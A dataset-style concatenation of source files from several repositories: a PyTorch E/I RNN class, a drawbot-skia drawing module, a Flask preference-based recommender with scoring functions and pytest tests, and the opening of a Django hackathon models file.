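# where alpha = dt / tau, D_rec fixes each unit's sign (Dale's law, 80% excitatory)
# and the diagonal of W_rec is masked out so units have no self-connections.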
class EIRnn(nn.Module):
def __init__(self, embedding_dim, input_units, hidden_units, output_units, vocab_size, num_layers = 1, dropout=0):
super(EIRnn, self).__init__()
self.embedding_dim = embedding_dim
self.input_units = input_units
self.hidden_units = hidden_units
self.output_units = output_units
self.num_layers = num_layers
self.dropout = dropout
for layer in range(num_layers):
layer_input_units = input_units if layer == 0 else hidden_units
cell = EIRnnModule(input_units = input_units, output_units = output_units, hidden_units = hidden_units)
setattr(self, 'cell_{}'.format(layer), cell)
self.embedding_layer = torch.nn.Embedding(vocab_size, embedding_dim)
# self.dropout_layer = nn.Dropout(dropout)
self.linear = nn.Linear(output_units * embedding_dim * num_layers, 2)
# self.softmax = nn.Softmax(dim=0)
self.reset_parameters()
def get_cell(self, layer):
return getattr(self, 'cell_{}'.format(layer))
def reset_parameters(self):
for layer in range(self.num_layers):
cell = self.get_cell(layer)
cell.reset_parameters()
def forward(self, input_, max_time = 15, input_once = True, states_init = None) :
if states_init is None:
states_init = torch.zeros([self.hidden_units, self.embedding_dim], dtype=torch.float)
# state_n = []
layer_output = None
all_layers_last_output = []
input0 = torch.zeros(len(input_), dtype=torch.long)
inputx = torch.tensor(input_, requires_grad = False)
for layer in range(self.num_layers):
cell = self.get_cell(layer)
output = []
states = states_init
for time in range(max_time):
if (input_once and time != 0) :
next_states, outs = cell(input_ = self.embedding_layer(input0), states = states)
else :
next_states, outs = cell(input_ = self.embedding_layer(inputx), states = states)
output.append(outs)
states = next_states
last_outs = outs
# layer_states = states
layer_output = torch.stack(output, 0)
all_layers_last_output.append(last_outs)
# input_ = self.dropout_layer(layer_output)
# state_n.append(layer_states)
# state_n = torch.stack(state_n, 0)
output = torch.stack(all_layers_last_output, 0)
output = output.view(self.output_units * self.embedding_dim * self.num_layers)
softmax_out = self.linear(output)
# softmax_out = self.softmax(out2softmax_in)
softmax_out = torch.stack([softmax_out], 0)
return softmax_out
``` |
{
"source": "13-Graphics/drawbot-skia",
"score": 3
} |
#### File: src/drawbot_skia/drawing.py
```python
import contextlib
import functools
import math
import skia
from .document import RecordingDocument
from .errors import DrawbotError
from .gstate import GraphicsState
class Drawing:
def __init__(self, document=None, flipCanvas=True):
self._stack = []
self._gstate = GraphicsState()
if document is None:
document = RecordingDocument()
self._document = document
self._skia_canvas = None
self._flipCanvas = flipCanvas
@property
def _canvas(self):
if self._skia_canvas is None:
self.size(1000, 1000) # This will create the canvas
return self._skia_canvas
@_canvas.setter
def _canvas(self, canvas):
self._skia_canvas = canvas
def newDrawing(self):
...
def endDrawing(self):
...
def size(self, width, height):
if self._document.isDrawing:
raise DrawbotError("size() can't be called if there's already a canvas active")
self.newPage(width, height)
def newPage(self, width, height):
if self._document.isDrawing:
self._document.endPage()
self._canvas = self._document.beginPage(width, height)
if self._flipCanvas:
self._canvas.translate(0, height)
self._canvas.scale(1, -1)
def width(self):
return self._document.pageWidth
def height(self):
return self._document.pageHeight
def rect(self, x, y, w, h):
self._drawItem(self._canvas.drawRect, (x, y, w, h))
def oval(self, x, y, w, h):
self._drawItem(self._canvas.drawOval, (x, y, w, h))
def line(self, pt1, pt2):
x1, y1 = pt1
x2, y2 = pt2
self._drawItem(self._canvas.drawLine, x1, y1, x2, y2)
def polygon(self, firstPoint, *points, close=True):
from .path import BezierPath
bez = BezierPath()
bez.polygon(firstPoint, *points, close=close)
self.drawPath(bez)
def drawPath(self, path):
self._drawItem(self._canvas.drawPath, path.path)
def clipPath(self, path):
self._canvas.clipPath(path.path, doAntiAlias=True)
def fill(self, *args):
self._gstate.setFillColor(_colorArgs(args))
def stroke(self, *args):
self._gstate.setStrokeColor(_colorArgs(args))
def blendMode(self, blendMode):
if blendMode not in _blendModes:
raise DrawbotError(f"blendMode must be one of: {_blendModesList}")
self._gstate.setBlendMode(blendMode)
def strokeWidth(self, value):
self._gstate.setStrokeWidth(value)
def lineCap(self, lineCap):
self._gstate.setLineCap(lineCap)
def lineJoin(self, lineJoin):
self._gstate.setLineJoin(lineJoin)
def lineDash(self, firstValue=None, *values):
if firstValue is None:
if values:
raise TypeError("lineDash() argument(s) should be None, or one or more numbers")
self._gstate.setLineDash(firstValue, *values)
def miterLimit(self, miterLimit):
self._gstate.setMiterLimit(miterLimit)
def font(self, fontNameOrPath, fontSize=None):
if fontSize is not None:
self.fontSize(fontSize)
self._gstate.setFont(fontNameOrPath)
def fontSize(self, size):
self._gstate.setFontSize(size)
def openTypeFeatures(self, *, resetFeatures=False, **features):
return self._gstate.setOpenTypeFeatures(features, resetFeatures)
def fontVariations(self, *, resetVariations=False, **variations):
return self._gstate.setFontVariations(variations, resetVariations)
def language(self, language):
return self._gstate.setLanguage(language)
def textSize(self, txt):
# TODO: with some smartness we can shape only once, for a
# textSize()/text() call combination with the same text and
# the same text parameters.
glyphsInfo = self._gstate.textStyle.shape(txt)
textWidth = glyphsInfo.endPos[0]
return (textWidth, self._gstate.textStyle.skFont.getSpacing())
def text(self, txt, position, align=None):
if not txt:
# Hard Skia crash otherwise
return
glyphsInfo = self._gstate.textStyle.shape(txt)
blob = self._gstate.textStyle.makeTextBlob(glyphsInfo, align)
x, y = position
self._canvas.save()
try:
self._canvas.translate(x, y)
if self._flipCanvas:
self._canvas.scale(1, -1)
self._drawItem(self._canvas.drawTextBlob, blob, 0, 0)
finally:
self._canvas.restore()
def image(self, imagePath, position, alpha=1.0):
im = self._getImage(imagePath)
paint = skia.Paint()
if alpha != 1.0:
paint.setAlpha(round(alpha * 255))
if self._gstate.fillPaint.blendMode != "normal":
paint.setBlendMode(self._gstate.fillPaint.skPaint.getBlendMode())
x, y = position
self._canvas.save()
try:
self._canvas.translate(x, y + im.height())
if self._flipCanvas:
self._canvas.scale(1, -1)
self._canvas.drawImage(im, 0, 0, paint)
finally:
self._canvas.restore()
@staticmethod
@functools.lru_cache(maxsize=32)
def _getImage(imagePath):
return skia.Image.open(imagePath)
def translate(self, x, y):
self._canvas.translate(x, y)
def rotate(self, angle, center=(0, 0)):
cx, cy = center
self._canvas.rotate(angle, cx, cy)
def scale(self, sx, sy=None, center=(0, 0)):
if sy is None:
sy = sx
cx, cy = center
if cx != 0 or cy != 0:
self._canvas.translate(cx, cy)
self._canvas.scale(sx, sy)
self._canvas.translate(-cx, -cy)
else:
self._canvas.scale(sx, sy)
def skew(self, sx, sy=0, center=(0, 0)):
cx, cy = center
if cx != 0 or cy != 0:
self._canvas.translate(cx, cy)
self._canvas.skew(math.radians(sx), math.radians(sy))
self._canvas.translate(-cx, -cy)
else:
self._canvas.skew(math.radians(sx), math.radians(sy))
def transform(self, matrix, center=(0, 0)):
m = skia.Matrix()
m.setAffine(matrix)
cx, cy = center
if cx != 0 or cy != 0:
self._canvas.translate(cx, cy)
self._canvas.concat(m)
self._canvas.translate(-cx, -cy)
else:
self._canvas.concat(m)
    @contextlib.contextmanager
    def savedState(self):
        self._stack.append(self._gstate.copy())
        self._canvas.save()
        try:
            yield
        finally:
            self._canvas.restore()
            self._gstate = self._stack.pop()
def saveImage(self, fileName):
if self._document.isDrawing:
self._document.endPage()
self._document.saveImage(fileName)
# Helpers
def _drawItem(self, canvasMethod, *items):
if self._gstate.fillPaint.somethingToDraw:
canvasMethod(*items, self._gstate.fillPaint.skPaint)
if self._gstate.strokePaint.somethingToDraw:
canvasMethod(*items, self._gstate.strokePaint.skPaint)
def _colorArgs(args):
"""Convert drawbot-style fill/stroke arguments to a tuple containing
ARGB int values."""
if not args:
return None
alpha = 1
if len(args) == 1:
if args[0] is None:
return None
r = g = b = args[0]
elif len(args) == 2:
r = g = b = args[0]
alpha = args[1]
elif len(args) == 3:
r, g, b = args
elif len(args) == 4:
r, g, b, alpha = args
else:
assert 0
return tuple(min(255, max(0, round(v * 255))) for v in (alpha, r, g, b))
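# Illustrative conversions for _colorArgs (added for clarity, not in the original source):
#   _colorArgs((1,))        -> (255, 255, 255, 255)   # single gray value: opaque white
#   _colorArgs((0.5, 0.25)) -> (64, 128, 128, 128)    # 50% gray at 25% alpha (ARGB order)
#   _colorArgs((None,))     -> None                    # None means "no paint"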
_blendModesList = [
'normal',
'multiply',
'screen',
'overlay',
'darken',
'lighten',
'colorDodge',
'colorBurn',
'softLight',
'hardLight',
'difference',
'exclusion',
'hue',
'saturation',
'color',
'luminosity',
'clear',
'copy',
'sourceIn',
'sourceOut',
'sourceAtop',
'destinationOver',
'destinationIn',
'destinationOut',
'destinationAtop',
'xOR',
'plusDarker',
'plusLighter',
]
_blendModes = set(_blendModesList)
``` |
{
"source": "13hannes11/bachelor_thesis_m.recommend",
"score": 3
} |
#### File: src/apis/recommender.py
```python
from flask_restplus import Namespace, Resource, fields
from .config import config_model
from managers.recommendation_manager import RecommendationManager
from model.configuration_model import ConfigurationModel
from model.preferences_model import Preferences
api = Namespace('recommender', description='Recommendation related operations')
rating_model = api.model('Rating', {
'code': fields.String(required=True, description='The code that was rated'),
'value': fields.Float(required=True, description='The rating value'),
})
preference_model = api.model('Preference', {
'user': fields.String(required=True, description='The user identifier'),
'ratings': fields.List(fields.Nested(rating_model),required=True, description='The list of ratings of this user'),
})
recommendation_request_model = api.model('Recommendation Request', {
    'configuration': fields.Nested(config_model, required=True, description='The current configuration'),
    'preferences': fields.List(fields.Nested(preference_model), required=True, description='The list of user preferences'),
})
@api.route('/')
class Recommendation(Resource):
manager = RecommendationManager()
@api.doc('get_recommendation')
@api.expect(recommendation_request_model)
@api.marshal_list_with(config_model)
def post(self):
'''Get recommendation'''
result = self.manager.getRecommendation(Preferences(api.payload), ConfigurationModel(api.payload['configuration']))
response = result
return response
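# Example request body (illustrative only; codes and values are made up):
# {
#   "configuration": {"configuration": ["A1", "B2"], "variables": []},
#   "preferences": [
#     {"user": "u1", "ratings": [{"code": "A1", "value": 0.8}]}
#   ]
# }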
```
#### File: src/model/configuration_model.py
```python
from typing import List
class ConfigurationVariablesModel:
def __init__(self, data):
self.value : str = data['value']
self.code : str = data['code']
class ConfigurationModel:
def __init__(self, data):
self.configuration : List[str] = []
self.variables : List[ConfigurationVariablesModel] = []
if data is not None:
self.configuration = data['configuration']
if 'variables' in data:
for v in data['variables']:
self.variables.append(ConfigurationVariablesModel(v))
```
#### File: src/model/preferences_model.py
```python
from typing import List
class Rating:
def __init__(self, data):
self.code = data['code']
self.value = float(data['value'])
if self.value < 0 or self.value > 1:
raise ValueError("Value of rating has to be in interval [0,1]")
def getValue(self):
""" Returns rating value """
return self.value
class UserPreference:
def __init__(self, data):
self.ratings : List[Rating] = []
self.user : str = data['user']
for rat in data['ratings']:
self.ratings.append(Rating(rat))
def getAllRatings(self) -> List[Rating]:
return self.ratings
def getRatingByCode(self, code : str) -> Rating:
return next(filter(lambda x : x.code == code, self.ratings), Rating({'code': code, 'value': 0.5 }))
class Preferences:
def __init__(self, data={ 'preferences' : [] }):
self.preferences : List[UserPreference] = []
for pref in data['preferences']:
self.preferences.append(UserPreference(pref))
def getAllUserPreferences(self) -> List[UserPreference]:
return self.preferences
def getAllRatingsByCode(self, code) -> List[Rating]:
list = []
for user_pref in self.preferences:
            list.append(user_pref.getRatingByCode(code))  # look up the passed code, not the literal string 'code'
return list
def getAllUsers(self) -> List[str] :
list = []
for userPref in self.preferences:
if userPref.user not in list :
list.append(userPref.user)
return list
def getRatingValueByUserAndCode(self, user, code) -> float:
for userPref in self.preferences:
if userPref.user == user :
for rating in userPref.ratings:
if rating.code == code:
return rating.getValue()
return 0.5
def getIndividualPreferences(self):
return list(map(lambda x: _create_preferences_and_add_user_pref(x), self.preferences))
def _create_preferences_and_add_user_pref(userPref):
tmp = Preferences()
tmp.preferences.append(userPref)
return tmp
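# Example (illustrative): given
#   prefs = Preferences({'preferences': [
#       {'user': 'u1', 'ratings': [{'code': 'A1', 'value': 0.7}]}]})
# prefs.getRatingValueByUserAndCode('u1', 'A1') returns 0.7, while any unknown
# user/code combination falls back to the neutral value 0.5.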
```
#### File: src/scoring/preferences_functions.py
```python
from typing import List
from model.preferences_model import Preferences, Rating
from model.configuration_model import ConfigurationModel
from model.product_structure_model import ProductStructureModel
from scoring.list_functions import ListToValueFunction
from scoring.value_functions import MapToPercent
class PreferencesToListFunction:
def convertToList(self, preferences : Preferences, toRate : ConfigurationModel) -> List[float]:
return []
class FlattenPreferencesToListFunction(PreferencesToListFunction):
def convertToList(self, preferences : Preferences, toRate : ConfigurationModel) -> List[float]:
list : List[Rating] = []
for user_pref in preferences.getAllUserPreferences():
for rating in user_pref.getAllRatings():
if rating.code in toRate.configuration:
list.append(rating.getValue())
else :
list.append(1 - rating.getValue())
return list
class SimplePerUserToListFunction(PreferencesToListFunction):
def __init__(self, listToValue : ListToValueFunction):
self.listToValueFunction = listToValue
def convertToList(self, preferences : Preferences, toRate : ConfigurationModel) -> List[float]:
list = []
for user_pref in preferences.getAllUserPreferences():
user_list : List[float] = []
for rating in user_pref.getAllRatings():
if rating.code in toRate.configuration:
user_list.append(rating.getValue())
else :
user_list.append(1 - rating.getValue())
list.append(self.listToValueFunction.convertToFloat(user_list))
return list
class SimpleSelectedCharacteristicsToListFunction(PreferencesToListFunction):
def __init__(self, listToValue : ListToValueFunction):
self.listToValueFunction = listToValue
def convertToList(self, preferences : Preferences, toRate : ConfigurationModel) -> List[float]:
list = []
for user_pref in preferences.getAllUserPreferences():
user_list : List[float] = []
for code in toRate.configuration:
user_list.append(user_pref.getRatingByCode(code).getValue())
list.append(self.listToValueFunction.convertToFloat(user_list))
return list
class PerUserPerFeatureDistanceAverageToListFunction(PreferencesToListFunction):
def __init__(self, featureListToValue : ListToValueFunction, product_structure : ProductStructureModel):
self.featureListToValueFunction = featureListToValue
self.product_structure = product_structure
def convertToList(self, preferences : Preferences, toRate : ConfigurationModel) -> List[float]:
user_preferences = preferences.getAllUserPreferences()
feature_list = self.product_structure.get_list_of_features()
user_scores = []
for user_pref in user_preferences:
feature_scores = []
for feature in feature_list:
char_list = feature.get_children_characteristics()
in_to_rate_rating = 0
avg = 0
for char in char_list:
if char.elementId in toRate.configuration:
in_to_rate_rating = user_pref.getRatingByCode(char.elementId).getValue()
avg += user_pref.getRatingByCode(char.elementId).getValue()
if len(char_list) > 0 :
avg = avg / len(char_list)
map_function = MapToPercent(1,-1)
feature_scores.append(map_function.applyToValue(in_to_rate_rating - avg))
user_scores.append(self.featureListToValueFunction.convertToFloat(feature_scores))
return user_scores
```
#### File: src/scoring/value_functions.py
```python
import math
class ValueToValueFunction:
def applyToValue(self, value : float) -> float :
return value
class MapToPercent(ValueToValueFunction):
def __init__(self, max_val : float, min_val : float):
self.max_val = max_val
self.min_val = min_val
def applyToValue(self, value : float) -> float :
return (value - self.min_val) / abs(self.min_val - self.max_val)
class HighpassFilterFunction(ValueToValueFunction):
def __init__(self, cutoff : float, floor_value=0):
self.cutoff = cutoff
self.floor_value = floor_value
def applyToValue(self, value : float) -> float :
if value < self.cutoff:
return self.floor_value
else:
return value
class LowpassFilterFunction(ValueToValueFunction):
def __init__(self, cutoff : float, ceiling_value=1):
self.cutoff = cutoff
self.ceiling_value = ceiling_value
def applyToValue(self, value : float) -> float :
if value > self.cutoff:
return self.ceiling_value
else:
return value
class PowerFunction(ValueToValueFunction):
def __init__(self, power : float):
self.power = power
def applyToValue(self, value : float) -> float :
return math.pow(value, self.power)
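# Illustrative values (added for clarity): PowerFunction(2).applyToValue(0.5) -> 0.25,
# MapToPercent(1, -1).applyToValue(0) -> 0.5, HighpassFilterFunction(0.5).applyToValue(0.3) -> 0.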
```
#### File: tests/test_model/test_preference_model.py
```python
from model.preferences_model import Preferences, Rating, UserPreference
import math
import pytest
class TestRating:
def test_range_conversion_minus_one_to_zero(self):
data = {
'code': 'abs',
'value': 0
}
assert math.isclose(0, Rating(data).getValue())
def test_range_conversion_one_to_one(self):
data = {
'code': 'abs',
'value': 1
}
assert math.isclose(1, Rating(data).getValue())
def test_range_conversion_zero_to_half(self):
data = {
'code': 'abs',
'value': 0.5
}
assert math.isclose(0.5, Rating(data).getValue())
def test_value_to_large(self):
with pytest.raises(ValueError):
data = {
'code': 'abs',
'value': 1.1
}
rating = Rating(data)
def test_value_to_small(self):
with pytest.raises(ValueError):
data = {
'code': 'abs',
'value': -0.1
}
rating = Rating(data)
class TestUserPreference:
data = {
'user': "user0",
'ratings':[ {
'code': 'abs',
'value': 0
}, {
'code': '2',
'value': 1
}, {
'code': '3',
'value': 0.5
}
]
}
def test_get_all_ratings(self):
user_pref = UserPreference(self.data)
assert len(user_pref.getAllRatings()) == 3
def test_get_rating_by_code(self):
user_pref = UserPreference(self.data)
rating = user_pref.getRatingByCode('2')
assert rating.code == '2'
assert rating.getValue() == 1
def test_get_rating_by_code_default(self):
user_pref = UserPreference(self.data)
rating = user_pref.getRatingByCode('notFOUND')
assert rating.code == 'notFOUND'
assert rating.getValue() == 0.5
class TestPreferences:
preferences = Preferences({
'preferences': [
{
'user': "user0",
'ratings':[ {
'code': 'in_both',
'value': 0
}, {
'code': 'only_in_one',
'value': 1
}, {
'code': '3',
'value': 0.5
}
]
},
{
'user': "user1",
'ratings':[ {
'code': 'in_both',
'value': 1
}, {
'code': '3',
'value': 1
}
]
}
]
})
def test_get_all_user_preferences(self):
assert len(self.preferences.getAllUserPreferences()) == 2
def test_get_all_rating_by_code(self):
assert len(self.preferences.getAllRatingsByCode('only_in_one')) == 2
assert len(self.preferences.getAllRatingsByCode('in_both')) == 2
def test_get_all_users(self):
assert len(self.preferences.getAllUsers()) == 2
assert "user0" in self.preferences.getAllUsers()
assert "user1" in self.preferences.getAllUsers()
def test_get_rating_by_user_and_code(self):
assert self.preferences.getRatingValueByUserAndCode("user0", "only_in_one") == 1
def test_empty_preferences(self):
assert len(Preferences({ 'preferences' : []}).getAllUsers()) == 0
def test_getIndividual_preferences(self):
assert len(self.preferences.getIndividualPreferences()) == 2
```
#### File: tests/test_scoring/test_list_functions.py
```python
from scoring.list_functions import Average, Product
import math
class TestListToValueFunctionAverage:
def test_simple_average(self):
function = Average()
list = [0.0, 1.0]
assert math.isclose(0.5, function.convertToFloat(list))
class TestListToValueFunctionProduct:
def test_simple_product(self):
function = Product()
list = [0.5, 0.5]
assert math.isclose(0.25, function.convertToFloat(list))
```
#### File: tests/test_scoring/test_scoring_functions.py
```python
from scoring.scoring_functions import PreferenceScoring, RatioCharacteristicConfigurationPenalty, WeightedFeaturePenalty, ReduceScoring
from scoring.value_functions import ValueToValueFunction
from model.configuration_model import ConfigurationModel
from model.preferences_model import Preferences
from scoring.list_functions import Min, Average
from scoring.preferences_functions import FlattenPreferencesToListFunction
from model.product_structure_model import ProductStructureModel
preferences = Preferences({
'preferences': [
{
'user': "user0",
'ratings':[ {
'code': 'A1',
'value': 0
}, {
'code': 'A2',
'value': 1
}, {
'code': 'B1',
'value': 0.5
}
]
},
{
'user': "user1",
'ratings':[ {
'code': 'A1',
'value': 1
}, {
'code': 'B2',
'value': 1
}
]
}
]
})
currentConfiguration = ConfigurationModel({
'configuration': ['A2', 'B2'],
'variables': []
})
toRate = ConfigurationModel({
'configuration': ['A1', 'B2'],
'variables': []
})
product_structure = ProductStructureModel({
'ProductStructure': [
{
'elementId': 'A',
'name': 'parent_element A',
'type': "FEATURE",
'additionalData': [],
'children': [
{
'elementId': 'A1',
'name': 'child A1',
'children': [],
'additionalData': [],
'type': "CHARACTERISTIC"
},
{
'elementId': 'A2',
'name': 'child A2',
'children': [],
'additionalData': [],
'type': "CHARACTERISTIC"
}
],
},{
'elementId': 'B',
'name': 'parent_element B',
'type': "FEATURE",
'additionalData': [],
'children': [
{
'elementId': 'B1',
'name': 'child B1',
'children': [],
'additionalData': [],
'type': "CHARACTERISTIC"
},
{
'elementId': 'B2',
'name': 'child B2',
'children': [],
'additionalData': [],
'type': "CHARACTERISTIC"
}
],
},
]
})
class TestRatioCharacteristicConfigurationPenalty:
def test_simple_example(self):
function = RatioCharacteristicConfigurationPenalty(product_structure, [ValueToValueFunction()])
assert 0.5 == function.calc_score(currentConfiguration, preferences, toRate)
class TestWeightedFeaturePenalty:
def test_simple_example(self):
function = WeightedFeaturePenalty(product_structure, Min(), Average())
assert 0.375 == function.calc_score(currentConfiguration, preferences, toRate)
class TestReduceScoring:
def test_combined(self):
function = ReduceScoring([
RatioCharacteristicConfigurationPenalty(product_structure, [ValueToValueFunction()]),
WeightedFeaturePenalty(product_structure, Min(), Average())
])
assert 0.875 == function.calc_score(currentConfiguration, preferences, toRate)
def test_none(self):
function = ReduceScoring([])
assert 0 == function.calc_score(currentConfiguration, preferences, toRate)
class TestPreferenceScoring:
def test_simple_example(self):
function = PreferenceScoring(
FlattenPreferencesToListFunction(),
Min()
)
assert 0 == function.calc_score(currentConfiguration, preferences, toRate)
```
#### File: tests/test_scoring/test_value_functions.py
```python
from scoring.value_functions import MapToPercent, ValueToValueFunction, HighpassFilterFunction, LowpassFilterFunction, PowerFunction
import math
class TestMapToPercent:
def test_range_conversion(self):
function = MapToPercent(-20, -40)
assert math.isclose(1, function.applyToValue(-20))
assert math.isclose(0, function.applyToValue(-40))
assert math.isclose(0.5, function.applyToValue(-30))
class TestValueToValueFunction:
def test_same_value(self):
function = ValueToValueFunction()
assert math.isclose(10, function.applyToValue(10))
class TestHighpassFilterFunction:
def test_higher_value(self):
function = HighpassFilterFunction(0.5)
assert math.isclose(0.8, function.applyToValue(0.8))
def test_lower_value(self):
function = HighpassFilterFunction(0.5)
assert math.isclose(0, function.applyToValue(0.3))
def test_same_value(self):
function = HighpassFilterFunction(0.5)
assert math.isclose(0.5, function.applyToValue(0.5))
class TestLowpassFilterFunction:
def test_higher_value(self):
function = LowpassFilterFunction(0.5)
assert math.isclose(1, function.applyToValue(0.8))
def test_lower_value(self):
function = LowpassFilterFunction(0.5)
assert math.isclose(0.3, function.applyToValue(0.3))
def test_same_value(self):
function = LowpassFilterFunction(0.5)
assert math.isclose(0.5, function.applyToValue(0.5))
class TestPowerFunction:
def test_power_one(self):
function = PowerFunction(10)
assert math.isclose(1, function.applyToValue(1))
def test_power_small_number(self):
function = PowerFunction(4)
assert math.isclose(0.0001, function.applyToValue(0.1))
``` |
{
"source": "13idyut/Y_Stub",
"score": 3
} |
#### File: 13idyut/Y_Stub/app.py
```python
import tensorflow as tf
import glob
from model.yolo import Yolo_v3
import argparse
from utils.detect import load_images, load_class_names, draw_boxes, load_weights
from utils.stub import word_dictionary, pre_final_dictionary, final_dictionary, is_are, comma_and_placement
import emoji
def paragraph_generator(contents):
with open('answer.txt', 'w') as answer:
if contents == '':
answer.write('No tag detected in the image.')
else:
answer.write(' '.join([str(item) for item in and_tag]) + ' ' +
is_tag + ' there in the given image.')
_MODEL_SIZE = (416, 416)
parser = argparse.ArgumentParser()
parser.add_argument(
'images', nargs='*', help='Must take in an image', type=str)
args = parser.parse_args()
image = vars(args)
image_list = image['images']
img = image_list[0]
img_names = glob.glob(img)
batch_size = len(img_names)
batch = load_images(img_names, model_size=_MODEL_SIZE)
class_names = load_class_names('./labels/coco.names')
n_classes = len(class_names)
max_output_size = 10
iou_threshold = 0.5
confidence_threshold = 0.7
model = Yolo_v3(
n_classes=n_classes,
model_size=_MODEL_SIZE,
max_output_size=max_output_size,
iou_threshold=iou_threshold,
confidence_threshold=confidence_threshold)
inputs = tf.placeholder(tf.float32, [batch_size, 416, 416, 3])
detections = model(inputs, training=False)
model_vars = tf.global_variables(scope='yolo_v3_model')
assign_ops = load_weights(model_vars, './weights/yolov3.weights')
with tf.Session() as sess:
sess.run(assign_ops)
detection_result = sess.run(detections, feed_dict={inputs: batch})
draw_boxes(img_names, detection_result, class_names, _MODEL_SIZE)
tf.reset_default_graph()
file = open('tag.txt', 'r')
contents = file.read()
words = contents.split('\n')
words = words[:-1]
sorted_words = sorted(words)
word_dictionary = word_dictionary(sorted_words)
final_dictionary = final_dictionary(pre_final_dictionary(word_dictionary))
is_tag = is_are(final_dictionary)
and_tag = comma_and_placement(final_dictionary)
paragraph_generator(contents)
print('\n\n\nAnswer generated successfully {}'.format(
emoji.emojize(":grinning_face_with_big_eyes:")))
``` |
{
"source": "13jacole/5e_GM_Tools",
"score": 4
} |
#### File: 5e_GM_Tools/Character_Gen/AbilityScore.py
```python
import random
#Function for ability scores
def ScoreGen():
while True:
print("You have chosen to generate new ability scores")
print("Please choose the number corresponding to your desired score generation method:\n")
print("1. Standard Array\n")
print("2. 4d6 drop lowest\n")
print("3. 3d6\n")
print("4. Custom scores\n")
dec = input()
if dec == "1":
method = 1
break
elif dec == "2":
method = 2
break
elif dec == "3":
method = 3
break
elif dec == "4":
method = 4
break
else:
print("Invalid method type. Please try again.\n")
while True:
print("Do you want to randomize your score placement? (Y/N):")
dec = input()
if dec.lower() == "y" or dec.lower() == "yes" or dec.lower() == "ye":
ra = True
break
elif dec.lower() == "n" or dec.lower() == "no":
ra = False
break
else:
print("Invalid input. Please try again")
#Call Function that generates scores
AbSc = [] # Str, Dex, Con, Int, Wis, Cha
# Generate scores
if method == 1: #Standard array
AbSc = [15, 14, 13, 12, 10, 8]
if method == 2: #4d6 drop lowest
for x in range(0, 6):
nums = []
nums.append(random.randint(1, 6))
nums.append(random.randint(1, 6))
nums.append(random.randint(1, 6))
nums.append(random.randint(1, 6))
nums.sort()
nums[0] = 0
Score = sum(nums)
AbSc.append(Score)
if method == 3: #3d6
for x in range(0, 6):
nums = []
nums.append(random.randint(1, 6))
nums.append(random.randint(1, 6))
nums.append(random.randint(1, 6))
Score = sum(nums)
AbSc.append(Score)
if method == 4: #Custom
for x in range(0, 6):
print("Please enter score " + str(x+1) + "\n")
AbSc.append(int(input()))
# Place scores
if ra:
random.shuffle(AbSc)
else:
Sc = AbSc
AbSc = []
Ab = ["Str", "Dex", "Con", "Int", "Wis", "Cha"]
while len(Ab) > 0:
print("Scores\n")
print("--")
for x in range(0, len(Sc)):
print(str(Sc[x]))
print("--")
print("\nPlease indicate which of the above scores you want to assign as your "+Ab[0]+ " Score: ")
dec = int(input())
if int(dec) in Sc:
AbSc.append(dec)
Sc.remove(dec)
del Ab[0]
else:
print("Not a valid value. Please try again.")
print("------")
return AbSc
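# Usage sketch (illustrative): ScoreGen() returns a six-element list ordered
# [Str, Dex, Con, Int, Wis, Cha]; e.g. the standard array with random placement
# might come back as [14, 8, 15, 10, 13, 12].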
```
#### File: Character_Gen/Races/Gnome.py
```python
import numpy as np
import pandas as pd
import random
def Darkvision():
Name = "Darkvision"
Feature = "You can see in dim light within 60 feet as if it were bright light, and in darkness as if it were dim light. You can't descern color in darkness, only shades of gray."
return Name, Feature
def GnomeCunning():
Name = "<NAME>"
Feature = "You have advantage on all Intelligence, Wisdom, and Charisma saving throws against magic."
return Name, Feature
``` |
{
"source": "13k/dota2-tools-proton",
"score": 3
} |
#### File: dota2-tools-proton/d2tp/dota2.py
```python
from __future__ import annotations
from pathlib import PosixPath
from .custom_game import CustomGame
class Dota2:
def __init__(self, path: str | PosixPath) -> None:
self.path: PosixPath = PosixPath(path).resolve()
self.content_path: PosixPath = self.path / "content"
self.addons_content_path: PosixPath = self.content_path / "dota_addons"
self.game_path: PosixPath = self.path / "game"
self.addons_game_path: PosixPath = self.game_path / "dota_addons"
self.compiler_path: PosixPath = self.game_path / "bin" / "win64" / "resourcecompiler.exe"
def custom_game(self, name: str, src_path: str | PosixPath) -> CustomGame:
return CustomGame(self, name, src_path)
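# Usage sketch (illustrative; the paths below are hypothetical):
#   game = Dota2("/path/to/steamapps/common/dota 2 beta")
#   addon = game.custom_game("my_addon", "/path/to/my_addon/src")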
```
#### File: dota2-tools-proton/d2tp/version.py
```python
from __future__ import annotations
from pathlib import Path
from typing import Any, Final, NamedTuple, Type, TypeVar
ProtonVersionT = TypeVar("ProtonVersionT", bound="ProtonVersion")
ERRF_INVALID_VERSION_FILE: Final = "Invalid proton version file {file}"
ERRF_INVALID_VERSION_STRING: Final = "Invalid proton version string in file {file}: {version!r}"
class ProtonVersion(NamedTuple):
"""Proton version"""
major: int
minor: int
prefix: int
@classmethod
def parse(cls: Type[ProtonVersionT], value: str | Any) -> ProtonVersionT | None:
if not isinstance(value, str):
return None
if "-" not in value:
return None
if "." not in value:
return None
proton, prefix = value.split("-", 1)
major, minor = proton.split(".", 1)
return cls(int(major), int(minor), int(prefix))
@classmethod
def parse_file(cls: Type[ProtonVersionT], file: Path) -> ProtonVersionT:
lines = file.read_text(encoding="utf-8").splitlines()
if len(lines) != 1:
raise ValueError(ERRF_INVALID_VERSION_FILE.format(file=file))
_, vstr = lines[0].split(" ", 1)
version = cls.parse(vstr.removeprefix("proton-"))
if version is None:
raise ValueError(ERRF_INVALID_VERSION_STRING.format(file=file, version=lines[0]))
return version
def __str__(self) -> str:
# pylint: disable=missing-format-attribute
return "{0.major}.{0.minor}-{0.prefix}".format(self)
# pylint: enable=missing-format-attribute
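# Example (illustrative): ProtonVersion.parse("7.0-4") -> ProtonVersion(major=7, minor=0, prefix=4),
# str(ProtonVersion(7, 0, 4)) -> "7.0-4", and malformed strings make parse() return None.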
``` |
{
"source": "13lift/OpenHackathonPlatform",
"score": 2
} |
#### File: lifter/hack/models.py
```python
from uuid import uuid4
from django.utils.translation import ugettext_lazy as _
from django.contrib.auth import get_user_model
User = get_user_model()
from django.db import models
from lifter.profiles.models import City
class Hacker(models.Model):
"""
    Team member
"""
user = models.ForeignKey(
User,
on_delete=models.DO_NOTHING,
blank=True,
null=True,
)
skils = models.CharField(max_length=32)
rating = models.PositiveIntegerField()
github = models.URLField()
slug = models.SlugField(
max_length=20,
blank=False,
)
def __str__(self):
return self.slug
class TeamStatus(object):
"""
    Team statuses
"""
NOT_READY = 0
READY = 1
EXCLUDED = -1
CHOICES = (
